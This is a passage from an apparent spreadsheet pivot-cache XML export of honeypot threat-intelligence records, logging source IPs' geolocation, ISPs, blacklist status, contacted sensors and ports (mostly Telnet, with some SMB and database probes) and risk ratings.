    <s v="hosting"/>
    <s v="HIVELOCITY, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2013-04-16 19:52:56"/>
    <s v="2026-04-15 23:59:59"/>
    <s v="2025-04-11 05:01:07"/>
    <s v="['ns1.hivelocity.net', 'ns2.hivelocity.net']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:175c:4ef3"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="933"/>
    <x v="933"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T10:03:46"/>
    <d v="2025-03-01T15:26:40"/>
    <d v="2025-04-24T10:03:46"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b58:374a"/>
    <s v="C-I&amp;&amp;C-U"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="934"/>
    <x v="934"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T09:54:55"/>
    <d v="2025-02-28T03:04:54"/>
    <d v="2025-04-24T09:54:55"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="VIC"/>
    <s v="Victoria"/>
    <s v="Melbourne"/>
    <s v="Melbourne"/>
    <s v="2158177"/>
    <s v="3001"/>
    <s v="-37.8136"/>
    <s v="144.963"/>
    <s v="9443"/>
    <s v="VOCUS PTY LTD"/>
    <s v="Vocus PTY LTD"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8bda:6cb0"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="935"/>
    <x v="935"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T09:38:36"/>
    <d v="2025-04-24T09:38:36"/>
    <d v="2025-04-24T09:38:36"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT-AS-VN"/>
    <s v="Vnpt"/>
    <s v="corporate"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:eb7:8e84"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="936"/>
    <x v="936"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T09:19:11"/>
    <d v="2025-04-24T09:19:11"/>
    <d v="2025-04-24T09:19:11"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="KIXS-AS-KR"/>
    <s v="Korea Telecom"/>
    <s v="corporate"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:afd3:4998"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="937"/>
    <x v="937"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T09:17:14"/>
    <d v="2025-04-24T09:12:28"/>
    <d v="2025-04-24T09:17:14"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:1229"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="938"/>
    <x v="938"/>
    <s v="NA&amp;&amp;125-227-184-229.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-24T07:33:09"/>
    <d v="2023-12-04T02:56:00"/>
    <d v="2025-04-24T07:33:09"/>
    <n v="44"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;27241"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.033"/>
    <s v="121.565"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="None"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de3:b8e5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="939"/>
    <x v="939"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T07:19:31"/>
    <d v="2025-04-24T07:19:31"/>
    <d v="2025-04-24T07:19:31"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:21f4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="940"/>
    <x v="940"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T07:18:44"/>
    <d v="2025-04-24T00:51:38"/>
    <d v="2025-04-24T07:18:44"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d4:3c6b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="941"/>
    <x v="941"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T07:18:12"/>
    <d v="2025-03-04T11:29:20"/>
    <d v="2025-04-24T07:18:12"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:70db"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="942"/>
    <x v="942"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T07:10:43"/>
    <d v="2025-01-12T22:01:04"/>
    <d v="2025-04-24T07:10:43"/>
    <n v="38"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="BA"/>
    <s v="Bahia"/>
    <s v="Feira de Santana Municipality"/>
    <s v="Feira de Santana"/>
    <s v="3463478"/>
    <s v="44000-000"/>
    <s v="-12.2536"/>
    <s v="-38.9601"/>
    <s v="268659"/>
    <s v="D. S. ALVES SERVICOS DE INTERNET"/>
    <s v="D. S. ALVES SERVICOS DE INTERNET"/>
    <s v="business"/>
    <s v="D. S. ALVES SERVICOS DE INTERNET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2da5:582a"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="943"/>
    <x v="943"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T07:04:18"/>
    <d v="2024-04-25T13:32:49"/>
    <d v="2025-04-24T07:04:18"/>
    <n v="219"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_SMB_H47&amp;&amp;SMA-LAB_SMB_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;3347&amp;&amp;445&amp;&amp;28514&amp;&amp;1433&amp;&amp;3306&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Gautam Buddha Nagar"/>
    <s v="Noida (Bishanpura)"/>
    <s v="7279746"/>
    <s v="201307"/>
    <s v="28.6099"/>
    <s v="77.3543"/>
    <s v="45528"/>
    <s v="Tikona Infinet Ltd."/>
    <s v="Tikona Infinet Ltd."/>
    <s v="business"/>
    <s v="Tikona Digital Networks Pvt.Ltd"/>
    <s v="2008-11-19"/>
    <s v="TIKONAIN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,8840)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,11963)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61018)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61033)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,2662)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,3675)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,6269)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61867)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,2119)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,3122)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,53872)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,54342)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,58361)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,58389)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59179)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,62292)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,62299)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,2118)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59515)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59522)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59968)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,54780)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,1576)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,55782)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,6739)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,9287)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,6168)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61683)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61719)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,4636)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61061)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61082)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61576)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59102)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59160)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59625)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,2921)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,3045)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,3734)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,7707)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,1602)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,8163)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,7935)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,9615)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,8078)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,56569)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,56635)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,57669)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,62235)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,62260)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,63018)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,64822)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,64828)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,65303)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,15699)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,5305)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,2027)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,5335)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,53303)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,3185)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61105)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61950)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,60438)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,60451)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,49163)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,49217)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,49621)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,57318)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71c1:22b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="944"/>
    <x v="944"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T06:54:41"/>
    <d v="2025-04-24T02:58:41"/>
    <d v="2025-04-24T06:54:41"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
